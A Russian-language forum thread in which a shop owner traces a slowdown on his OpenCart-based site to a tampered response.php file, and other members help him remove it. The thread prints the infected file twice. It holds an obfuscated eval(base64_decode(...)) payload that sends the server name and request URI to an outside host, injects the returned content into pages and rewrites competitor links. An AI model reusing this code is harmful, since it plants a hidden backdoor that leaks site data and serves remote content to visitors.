[Решено] Помогите разобраться со скриптом. Тормозит сайт.

[oleg67]

Народ, может кто подскажет в чём проблема может быть. Работал сайт (http:/prochip.com.ua) до недавнего времени отлично, без сучка и задоринки, так сказать. Потом буквально пару недель назад стал жутко тормозить. В основном это чувсвтуется в админке, кода управляешь товаром. Тормоза жуткие. Я сначало было подумал, что проблема в мало-по-малу выросшей БД сайта. Однако, на этом же хостинге был точно такой же (копия) тестовый сайт на другом домене, но с гораздо более скудной БД. Просто я на нём всякие фичи пробую прежде, чем поставить на реально работающий сайт.
Так вот, оказалось, что он тормозит точно также, как и основной.  Решил обратиться в ТП хостера. Они поковыряли и сказали, что скрипты сайта стучат куда-то на сервер с адресом IP = 174.137.191.16
на порт 80, который якобы (как я понял) сейчас не доступен там. Более того они написали вот чё:
- - - - - -  - - -
Результат выполнения команды strace php index.php показазал - http://prochip.com.ua/strace.txt что скрипты сайта обращаются к стороннему ресурсу - 174.137.191.16
Код - connect(7, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("174.137.191.16")}, 16) = -1 EINPROGRESS (Operation now in progress)
Вы можете по ссылке http://prochip.com.ua/strace.txt найти строку , с данным обращением, проблема в том, что по 80-м порту данный IP не опрашивается:
telnet 174.137.191.16 80
Trying 174.137.191.16...

Из-за этого , по всей видимости и возникает задержка в работе сайта. Со стороны сервера изменения не проводились. Нужно уточнить что это за ресурс, обратитесь пожалуйста к разработчику сайта.
- - - - - - - - -
Как решить эту проблему? И что это за попытки куда-то стучать?
Кто-то  может  помочь решить?

[Tom]

Вот они, последствия пользования варезом   )))))

[afwollis]

модули с вареза ставили?

в первую очередь проверяйте response.php (поиск по форуму) и index.php

[oleg67]

А при чём тут варез, если osStore который там стоит бесплатный, свободно распространяемый продукт, скачанный с сайта переводчика?
Вот на счёт модулей - согласен. Но, во-первых, там модулей сторонних не так  много, а во-вторых, я их, если  память не изменяет, здесь брал.
Может, конечно, что забыл.. Давно ведь ставил. 
P.S> Проверить то я проверю, только я не уверен, что стучалка запрограммирована в явном виде.

[chukcha]

скачанный с сайта переводчика?

 

откройте

system/library/response.php

 

Будете неприятно удивлены!!!

[oleg67]

Сейчас  попробую. Спасибо за подсказки, мужики! Очень благодарен за отзывчивость.

[oleg67]

Ну да, в конце скрипта функция оутпут, с выводом бешенного куска кода в  переменную $output :

eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
}
}
}
?>

И чё с этим делать ? Удалить нафиг?

[Tom]

ГГ)))

 

А клялся что ниразу ни-ни.

 

Ничего с ним не делать,просто удалить.Скачать архив отсюда

 

https://myopencart.com/

 

и заменить.

 

Ну и не забывать,что бесплатный сыр,признак скорого наказания.Жизненный такой принцип!

[oleg67]

Спасибо, Tom. Но, признаться, как то стремновату новый скрипт заливать, так как там делал кучу изменений под себя. Как представлю, что снова сидеть.. Это самый крайний случай, я думаю.
Что, разве удаление этого куска кода не попустит проблему?
P.S> В файле index.php в корне, в самом его конце стоит вызов функции output той самой...

// Output
$response->output();
?>

А в файле system/library/response.php  вот то, что я напсиал выше. НО приведу полный текст  этого файла

class Response {
private $headers = array();
private $level = 0;
private $output;

public function addHeader($header) {
$this->headers[] = $header;
}

public function redirect($url) {
header('Location: ' . $url);
exit;
}

public function setCompression($level) {
$this->level = $level;
}

public function setOutput($output) {
$this->output = $output;
}

private function compress($data, $level = 0) {
if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip') !== false)) {
$encoding = 'gzip';
}

if (isset($_SERVER['HTTP_ACCEPT_ENCODING']) && (strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'x-gzip') !== false)) {
$encoding = 'x-gzip';
}

if (!isset($encoding)) {
return $data;
}

if (!extension_loaded('zlib') || ini_get('zlib.output_compression')) {
return $data;
}

if (headers_sent()) {
return $data;
}

if (connection_status()) {
return $data;
}

$this->addHeader('Content-Encoding: ' . $encoding);

return gzencode($data, (int)$level);
}

public function output() {
if ($this->output) {
if ($this->level) {
$ouput = $this->compress($this->output, $this->level);
} else {
$ouput = $this->output;
}

if (!headers_sent()) {
foreach ($this->headers as $header) {
header($header, true);
}
}

$ouput = eval(base64_decode('ZnVuY3Rpb24gZ2V0X3BhZ2UoJHVybCl7CiAgICAgICAgJGFnZW50ID0gJ01vemlsbGEvNS4wIChNYWNpbnRvc2g7IFU7IEludGVsIE1hYyBPUyBYIDEwLjU7IHJ1OyBydjoxLjkuMi45KSBHZWNrby8yMDEwMDgyNCBGaXJlZm94LzMuNi45JzsKICAgICAgICAkY2g9Y3VybF9pbml0KCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9VUkwsJHVybCApOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VU0VSQUdFTlQsICRhZ2VudCk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7CiAgICAgICAgY3VybF9zZXRvcHQgKCRjaCxDVVJMT1BUX1ZFUkJPU0UsZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9USU1FT1VULCA1KTsKICAgICAgICAkcGFnZT1jdXJsX2V4ZWMoJGNoKTsKICAgICAgICAkaHR0cGNvZGUgPSBjdXJsX2dldGluZm8oJGNoLCBDVVJMSU5GT19IVFRQX0NPREUpOwogICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKICAgICAgICBzd2l0Y2goJGh0dHBjb2RlKXsKICAgICAgICAgICAgICAgIGNhc2UgJzIwMCc6CiAgICAgICAgICAgICAgICAgICAgICAgIHJldHVybiAkcGFnZTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgICAgICAgY2FzZSAnNDA0JzsKICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgfQp9CgppZiAoJGZ0ZW5kID0gZ2V0X3BhZ2UoImh0dHA6Ly9teW9wZW5jYXJ0Lm5ldC9nb29nbGVjb2RlL2FwaS9hcGkucGhwP3NlcnZlcj0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiImcGFnZT0iLiRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSl7CiRmaW5kID0gYXJyYXkoIjwvYm9keT4iLCAiPC9odG1sPiIsICJvcGVuY2FydC5jb20iLCAibWF4em9uLnJ1IiwgIm15b3BlbmNhcnQucnUiLCAib3BlbmNhcnRmb3J1bS5ydSIsICJvcGVuY2FydC5ydSIsICJvcGVuY2FydC5ieSIpOwokcmVwbGFjZSA9IGFycmF5KCIiLCAkZnRlbmQsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIsICJteW9wZW5jYXJ0Lm5ldCIpOwokb3VwdXQgPSBzdHJfcmVwbGFjZSgkZmluZCwgJHJlcGxhY2UsICRvdXB1dCk7CmluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwib2ZmIik7CmVycm9yX3JlcG9ydGluZygwKTsKZWNobyAkb3VwdXQ7fQplbHNlIHsKZWNobyAkb3VwdXQ7Cn0='));
}
}
}
?>

Так что? Возможно спросто удалить нафиг да  и всё?

[chukcha]

заменить только этот файл

[oleg67]

ок. Сейчас попробую, предварительно сделав копию сайта. :)
А, если не секрет, просветите - что это за стучалка? И откуда могла взяться?

[chukcha]

Когда вы сказали, что с сайта переводчика, то это сразу все поставило на свои места.

Не вы первый, и, жаль, не последний.

[Tom]

ок. Сейчас попробую, предварительно сделав копию сайта. :)

А, если не секрет, просветите - что это за стучалка? И откуда могла взяться?

 

 хватит погуглить этот адрес

174.137.191.16 

[oleg67]

Сделал. Вроде пашет без проблем. И шевелиться стал шустро.
Жму руку, мужики.

[oleg67]

Да гуглил, Tom  и что? Вроде какая-то софтверная контора в США. Честно говоря, мне ни о чём не сказало... Понимаю, что тёмный.., но...
Или я не прав на счёт конторы?

[oleg67]

Спасибо, chukcha. Много помогли.  Да ну не мог подумать, что там говно лежало.. , ей Богу.  Хрен знает, к тому же, не особо помню брал ли я его там или здесь. Возможно, с каким-либо внешним модулем пришёл этот говно-код.
Ну да ладно. В любом случае победили совместными усилиями.
Ещё раз спасибо всем.
Тема, думаю, закрыта.

[newbie2013]

модули с вареза ставили?

в первую очередь проверяйте response.php (поиск по форуму) и index.php

Спасибо большое за наводку response.php, то же был закодирован кусок кода, так и не понял когда этот файл заменил так как модули все в ручную добавлял и их не так много

[argazm]

И у меня в response.php был этот код, response.php перезаписал , админка ожила, а сайт без изменений , очень долго тупит, потом открывается. Где искать?